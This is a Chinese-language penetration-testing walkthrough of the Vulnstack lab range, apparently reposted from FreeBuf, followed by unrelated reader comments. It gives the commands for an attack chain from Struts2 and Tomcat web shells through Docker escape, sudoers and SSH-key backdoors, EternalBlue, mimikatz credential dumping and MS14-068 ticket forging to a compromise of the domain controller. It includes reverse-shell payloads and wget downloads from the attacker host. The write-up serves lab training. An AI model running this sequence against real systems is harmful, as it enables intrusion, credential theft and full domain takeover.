靶场搭建
靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/
共有三台主机DC、WEB、WIN7
机器密码
WEB主机 ubuntu:ubuntu
WIN7主机 douser:Dotest123
(DC)WIN2008主机 administrator:Test2008
网络配置
创建两个子网vmnet0和vmnet1
vmnet1:192.168.183.0
WEB主机网卡设置
WIN7主机网卡设置
DC主机网卡设置
攻击机kali的网卡和WEB主机的第一章出网网卡一致为NAT模式
WEB主机(Ubuntu)
DC主机(Windows 2008)
WIN7
WEB主机(Ubuntu)上启动环境
sudo docker start ec 17 09 bb da 3d ab ad
渗透测试
扫描端口开放情况
nmap -sS -p 1-65535 -A 192.168.48.146
端口22开放,存在SSH服务
2001,2002,2003端口开放,存在WEB
看到2001使用了Struts2中间件
2002使用了Apache Tomcat中间件
2003为Apache、PHPmyadmin、mysql
访问WEB
2001端口
2002端口
2003端口,发现不需要密码就可以进入phpmyadmin后台
利用Struts2漏洞获得shell
使用了Struts2
直接使用工具进行检测和利用
利用漏洞上传msf马
生成msf马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f jsp > shell.jsp
msf启动监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.48.136
exploit
访问马
成功收到会话
利用phpmyadmin后台获得shell
还可以利用phpmyadmin来使用数据库日志写入马来获得会话,这里就不做演示了,方法和之前的红日靶场一的一样,可以前往查看。链接:https://blog.csdn.net/weixin_45682839/article/details/123410686
利用Tomcat漏洞获得shell
还可以利用Tomcat CVE-2017-12615 任意文件写入
payload
PUT /1.jsp/ HTTP/1.1 Host: 192.168.3.103:2002 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 5
利用payload写入msf马
访问马
成功获得会话
内网渗透
在获得中打开shell
不是完整的shell,使用pyhton中的pty模块反弹一个完整的shell环境
python -c ‘import pty;pty.spawn(“/bin/bash”)’
进行信息搜集
查看系统进程的cgroup信息
ls -alh /.dockerenv
发现为Docker环境
Docker逃逸
利用dirty cow来进行docker逃逸
这种利用方法利用成功的前提是,宿主机的内核有dirty cow漏洞。
git clone https://github.com/scumjr/dirtycow-vdso.git
cd dirtycow-vdso
make
在目标主机上无法进行make编译,我们在攻击机kali上编译之后通过kali临时搭建一个python网站
python -m SimpleHTTPServer 80
在目标主机上使用命令下载编译好的文件
wget http://192.168.48.136/0xdeadbeef
192.168.48.136位kali的ip
利用工具反弹shell到本地主机
chmod +x 0xdeadbeef
./0xdeadbeef ip:port #反弹shell到指定主机的指定端口
./0xdeadbeef 127.0.0.1 1234
利用失败,不存在dirtycow漏洞
换另一种方式进行docker逃逸
利用特权模式进行逃逸
使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。
查看磁盘文件
fdisk -l
在这里发现一个问题,通过Struts2获得的shell,的磁盘文件为空,所以利用不了
但是通过Tomcat获得的shell就可以利用
创建一个文件夹,将宿主机根目录挂载至容器目录下
mkdir /out
mount /dev/sda1 /out
添加账号密码通过ssh进行登录
echo “qwe1:x:1006:1006:qwe1,,,:/home/qwe1:/bin/bash” >> test/etc/passwd
echo “qwe1:$1$xJbww$Yknw8dsfh25t02/g2fM9g/:18381:0:99999:7:::” >> test/etc/shadow
一直提示密码不正确,试了很多遍都是这样
通过写入ssh秘钥
在kali上生成秘钥
ssh-keygen -t rsa (密码为空)
> out1/home/ubuntu/.ssh/authorized_keys”,”marks”:[{“type”:”inlineCode”}]}]}],”state”:{}}]’>
将生成的公钥写入目标主机
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0y3RzGTTLabQjOv0QALZnrPq1Rf2gGOwNZ+AIGVGHHVWun5MZhJRo+FBGhAVrFIwvYchZzKRs8T8W7YmsSBHykKMR6LfpYl1QOXop2eCSOTwj8dfYgPFv22d7pdYK4Vicmwu9RIpcqAdrZ1E0N+WgdIxDz7/rHi9Tku7o2DkFekvMM6UOkmGo7CL0C17iAyRmAlIOBV/+oz6MdPQOSJ4BpcvS6U9kS3dJli8fNDylt+wWH4Uh5CbuJnfJDiOkm+Tvxw6qBpv9t5v1iWK3cXwFc60g2oGm68fuBV1mrLEQQVdcpj8xczWfMzJFOxWBHSVWWcwHT7L+BI6SKvXtOlLtRJbZ+KtKBGXRF/XKMyjjtd35b5Ol5Ounn7OEqrE1/epQbJ7NjDj2apNcpg+xIZQpLJIj9qREDdtpkFmii8XsZnZr/uBy2D5wUMpFinE9RMGoqcxj1BWIXclrQy94e1Vjyd6n/JtirspLMNOhSxjNuydewq0pd9VwQkcEhYaIZ9U= root@kali' >> out1/home/ubuntu/.ssh/authorized_keys
写入后进行登录(免密登录),试了很多次也没有成功
又试了写入计划任务外连,也没有成功
这里只好直接用Ubuntu密码直接登录ssh了
普通用户权限
提权
ubuntu是用命令行执行命令,在普通用户下的操作很受限,无法变成管理员权限,所以需要在一个文件/etc/sudoers处加入普通用户的放行语句,才可以让普通用户在ssh的情况下进行提权。
echo ‘ubuntu ALL=(ALL:ALL) ALL’ >> out/etc/sudoers
(在docker中的shell中执行)
sudo su root
上传msf马,获得msf会话
生成msf马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f elf > shell.elf
启动临时网站
python -m SimpleHTTPServer 80
将msf马下载到目标主机
wget http://192.168.48.136/shell.elf
msf进行监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.48.136
exploit
执行msf马,成功收到会话
内网信息搜集
ifconfig
发现内网网卡
添加路由建立代理
route add 192.168.183.0 255.255.255.0 2
利用earthworm建立代理
在kali上执行命令
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
在目标主机上上传ew_for_linux64
执行命令
./ew_for_linux64 -s rssocks -d 192.168.48.136 -e 1234
vi /etc/proxychains4.conf
测试代理是否创建成功
ping 192.168.183.128
内网存活主机探测
use auxiliary/scanner/discovery/udp_probe
set RHOSTS 192.168.183.0/24
set THREADS 5
exploit
发现两台主机:
192.168.183.130 WIN-ENS2VR5TR3N
192.168.183.128 TESTWIN7-PC
横向移动
扫描内网主机端口开放情况
nmap -sS -p 1-65535 -A 192.168.183.130
发现130主机为域控,域名为demo.com
nmap -sS -p 1-65535 -A 192.168.183.128(因为-A全扫描太费时间了,这里第二个就不用了)
两台主机都开放了445端口,试一下使用永恒之蓝
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.183.132(我这里win7主机中途重启了,IP地址改变了,之前是128)
set RHOSTS 192.168.183.130
两台主机都存在永恒之蓝,利用
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.183.135(重启了,ip地址又改变了,现在135是win7)
试了好几遍都没有成功,后来发现是本机的的火绒给拦截了,关闭火绒后就成功了
成功拿下WIN7主机
Windows2008试了好几次,然后打蓝屏了,没有拿下,换个模块试试
use exploit/windows/smb/ms17_010_psexec
还是不行
换其它方式
回到WIN7会话,进程迁移
migrate PID
使用mimikatz,也可以使用msf中的mimikatz(在高版本msf中被kiwi取代)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
mimikatz工具这台主机桌面上已经有了,靶场搭建者准备好的
USER:douser
Domain:DEMO.COM
NTLM:bc23b0b4d5bf5ff42bc61fb62e13886e
SID:S-1-5-21-979886063-1111900045-1414766810-1107
PASSWORD:Dotest123
利用Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324)来获得域控。
该漏洞可导致活动目录整体权限控制受到影响,允许攻击者将域内任意用户权限提升至域管理级别。通俗地讲,如果攻击者获取了域内任何一台计算机的Shell权限,同时知道任意域用户的用户名、SID、密码,即可获得域管理员权限,进而控制域控制器,最终获得域权限。
使用PyKEK可以生成一张高权限的服务票据,并通过mimikatz将服务票据注人内存。
使用PyKEK,可以将Python文件转换为可执行文件(在没有配置Python环境的操作系统中也可以执行此操作,在这台靶机中靶场搭建者已经给大家准备好了可执行文件版的MS14-068.exe)
微软针对MS14-068 ( CVE-2014-6324)漏洞提供的补丁为KB3011780
操作步骤
1、生成高权限票据
MS14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u douser@DEMO.COM -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
2、查看注入前的权限
将票据文件复制到Windows Sever 2008机器的mimikatz目录下,使用mimikatz将票据注入内存。输入命令“net use \\WIN-ENS2VR5TR3N\c$”,提示“Access is denied”,表示在将票据注入前无法列出域控制器C盘目录的内容。
3、清除内存中的所有票据
打开mimikatz
输入kerberos::purge
当看到”Ticket(s) purge for current session is OK’时,表示清除成功
4、将高权限的票据注入内存
kerberos::ptc “TGT_user1@pentest.com.ccache”(双引号里面的是票据的名字)
kerberos::ptc “TGT_douser@DEMO.COM.ccache”
注入成功
生成一个msf马通过文件共享上传至域控主机
首先关闭WIN7防火墙
NetSh Advfirewall set allprofiles state off
生成msf bind马
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.183.130 LPORT=7777 -f exe > shell.exe
开启WIN7 3389远程连接用于上传文件
wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1
在WIN7上创建新的用户并加入到管理员组
net user aaa qwe123!asd /add
net localgroup administrators aaa /add
通过远程桌面上传msf马到域控
在kali上输入命令
rdesktop 192.168.183.137 -r disk:wj=/root
-r 为指定共享的磁盘
用刚才添加的账号登录
将刚生成的msf马复制到WIN7中
再通过文件共享将马复制到域控中
copy shell.exe \\WIN-ENS2VR5TR3N\c$
schtasks /create /S WIN-ENS2VR5TR3N /TN “test” /TR c:/shell.exe /SC MINUTE /ST 21:27 /ru system /f
msf开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.183.130
set LPORT 7777
exploit
等了很久没有收到会话,在域控上看到7777端口处于监听模式,证明计划任务执行成功,没有收到会话肯定是因为防火墙拦截了
再创建一个计划任务关闭防火墙
echo NetSh Advfirewall set allprofiles state off >> 1.bat
copy 1.bat \\WIN-ENS2VR5TR3N\c$
schtasks /create /S WIN-ENS2VR5TR3N /TN “test1” /TR c:/1.bat /SC ONCE /ST 21:57 /ru system /f
成功收到会话
本文作者:xiaopanghacker, 转载请注明来自FreeBuf.COM
cesfe 1个月前0
好的,谢谢昶之琴 1个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 1个月前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下